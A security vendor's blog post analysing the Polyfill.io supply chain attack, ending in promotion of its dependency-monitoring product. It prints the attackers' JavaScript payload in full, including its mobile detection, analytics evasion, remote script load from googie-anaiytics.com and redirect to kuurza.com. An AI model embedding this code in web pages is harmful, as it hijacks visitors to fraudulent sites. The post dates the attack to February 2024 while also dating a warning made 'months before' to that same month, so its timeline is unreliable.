In February 2024, the Polyfill.io supply chain attack—a prime example of software supply chain attacks—compromised over 100,000 websites globally. This incident involved package hijacking, where FUNNULL, a malicious entity, gained control of Polyfill’s domain and GitHub repository, injecting malware into the service. The malware specifically targeted mobile users, redirecting them to fraudulent gambling websites by exploiting vulnerabilities in Polyfill’s dynamic code delivery based on HTTP headers and user agents.
Technical Breakdown: How the Polyfill Attack Worked
Polyfill is widely adopted to ensure compatibility between modern web features and older browsers. The attackers used package hijacking by purchasing the cdn.polyfill.io domain and embedding malicious scripts. What made this attack so dangerous was the sophisticated behavior of the malware:
- Dynamic Code Generation: Polyfill’s service generated customized JavaScript responses based on the device accessing the website (e.g., mobile vs. desktop), HTTP headers, and user agents. Attackers exploited this dynamic nature, injecting malicious payloads tailored for specific devices—particularly mobile phones
. - Evasion Techniques: The malware was smart. It delayed execution when analytics services like Google Analytics were detected, preventing its actions from appearing in site statistics. Additionally, it didn’t activate if admin users or developers were detected, further avoiding early detection during debugging or testing
. - Mobile Redirection: Once activated, the malware redirected users to fraudulent gambling websites by impersonating legitimate domains (e.g., googie-anaiytics.com). The attackers even manipulated time windows to reduce suspicion, executing the payload only during certain hours to catch unsuspecting mobile users off guard
.
Biggest Sites Hit by the Polyfill Attack
The Polyfill supply chain attack affected over 100,000 websites, including major organizations such as:
- World Economic Forum
- Intuit
- JSTOR
- Bank of Ireland
- Coldwell Banker
- Live Nation
- Brandeis University
- Dubai Airports Company
- Environmental Defense Fund
These high-profile victims underscore the global reach of the attack and the vulnerability of large institutions to supply chain breaches.
Early Warnings and Response
Andrew Betts, Polyfill’s original creator, warned developers months before the attack to stop using the Polyfill service after he lost control of the domain. His warning went largely unheeded until FUNNULL’s attack was launched. Once detected, content delivery networks like Cloudflare and Fastly provided secure alternatives, while Betts reiterated his advice for developers to remove Polyfill references entirely
No website today requires any of the polyfills in the https://t.co/3xHecLPXkB library. Most features added to the web platform are quickly adopted by all major browsers, with some exceptions that generally can't be polyfilled anyway, like Web Serial and Web Bluetooth.
— Andrew Betts (@triblondon) February 25, 2024
Polyfill malicious payload example
To illustrate the sophistication of the Polyfill supply chain attack, Sansec provided a detailed example of the malicious payload used. This payload dynamically adapted based on the user’s device, triggering redirects to fraudulent websites and employing techniques to evade detection. For a closer look at the technical breakdown of this payload, you can check Sansec’s full analysis and malicious code sample.
function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS(
"https://www.googie-anaiytics.com/html/checkcachehw.js",
function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
}
);
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (
_curHost.indexOf("www.dxtv1.com") !== -1 ||
_curHost.indexOf("www.ys752.com") !== -1
) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_hours >= 0 && _hours < 2) {
if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
} else {
if (_hours >= 2 && _hours < 4) {
_rnd <= 15 && (_redirectURL = _kuurzaBitGet);
} else {
if (_hours >= 4 && _hours < 7) {
_rnd <= 20 && (_redirectURL = _kuurzaBitGet);
} else {
_hours >= 7 && _hours < 8
? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
: _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
}
}
}
}
}
}
_redirectURL != "" &&
!isPc() &&
document.cookie.indexOf("admin_id") == -1 &&
document.cookie.indexOf("adminlevels") == -1 &&
vfed_update(_redirectURL);
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();Why Did Polyfill Supply Chain Attack Happen?
The Polyfill supply chain attack underscores the critical vulnerabilities in third-party dependency management. The modern JavaScript ecosystem relies heavily on open-source libraries, and developers often use tools like npm to integrate these libraries automatically. Without rigorous auditing or continuous monitoring, compromised packages can slip through undetected, as seen with Polyfill.
Moreover, the rapid pace of development and deployment in today’s software environments often prioritizes functionality and speed over thorough security checks. Attackers exploit this gap, targeting popular libraries to maximize their impact. In the case of Polyfill, once attackers gained control of the domain, they leveraged the library’s widespread usage to inject malicious code across a vast number of websites.
This incident highlights the importance of implementing stringent security measures, such as dependency auditing tools, real-time monitoring, and robust incident response plans, to protect against similar software supply chain attacks. Organizations must prioritize security in their development workflows to safeguard their digital ecosystems effectively.
Preventing Future Attacks: Robust Dependency Management
When managing dependencies, Xygeni’s Open Source Security platform employs multiple layers of protection, designed to detect, quarantine, and remediate malicious components in real-time and avoid software supply chain attacks.
Real-Time Malware Detection: Xygeni continuously monitors public registries, scanning for suspicious code before it enters the development environment. This allows for proactive blocking of threats like the Polyfill attack, as highlighted in Luis Rodriguez’s article series.
Automated Alerts & Quarantine: Xygeni automatically isolates compromised packages and generates alerts, allowing development teams to act quickly. By integrating with CI/CD pipelines, any threat can be halted before it reaches production. In cases like the Polyfill incident, this feature prevents widespread impact by stopping malicious code early.
Dynamic Prioritization & SBOM: Xygeni dynamically prioritizes vulnerabilities based on context, exploitability, and business impact. By generating a real-time Software Bill of Materials (SBOM), organizations can track all third-party components, ensuring complete transparency. This real-time monitoring is crucial when managing open-source dependencies, allowing quick responses to incidents like Polyfill’s hijacking.
In the article series by Luis Rodriguez, the focus on proactive defense against malicious open-source packages is discussed in detail. Xygeni’s approach not only covers real-time detection but also provides automated remediation pathways, enabling organizations to roll back to safe versions without disrupting production
Check out the Open Source Malicious Packages article series here to learn more about how Xygeni manages open-source security.
Protect Your Open Source Dependencies from Malware
Discover proactive strategies to secure your open-source software from malware threats. Download our whitepaper for essential insights on malware protection.
Lessons from the Polyfill Attack
The Polyfill.io supply chain attack teaches crucial lessons about the risks of third-party dependencies in modern web development.
- Vigilance in Third-Party Dependencies: This is the most critical takeaway. Organizations must regularly review, vet, and monitor all third-party libraries they use. Over-reliance on unvetted dependencies can expose systems to serious risks.
- Proactive Security Measures: Continuous monitoring, such as with Xygeni’s real-time threat detection, can catch vulnerabilities early.
- Education and Training: Keeping all team members updated on the latest threats strengthens organizational security.
The Polyfill supply chain attack serves as a powerful reminder of the growing threat posed by software supply chain attacks. These attacks exploit vulnerabilities in widely used third-party components, leaving organizations of all sizes exposed. By adopting proactive security measures, such as real-time monitoring, automated threat detection, and robust dependency management—like those offered by Xygeni—companies can protect themselves from similar threats in the future. Staying vigilant and maintaining comprehensive oversight of third-party libraries are key to preventing large-scale compromises like Polyfill.
Secure Your Open Source Dependencies Against Software Supply Chain Attacks
Don’t let your application fall victim to software supply chain attacks like Polyfill. Xygeni’s Open Source Security platform offers real-time monitoring, advanced dependency mapping, and automated remediation to protect your development pipelines from compromised packages.
Take control of your software supply chain today. Save a demo and see how Xygeni can safeguard your organization from future threats.
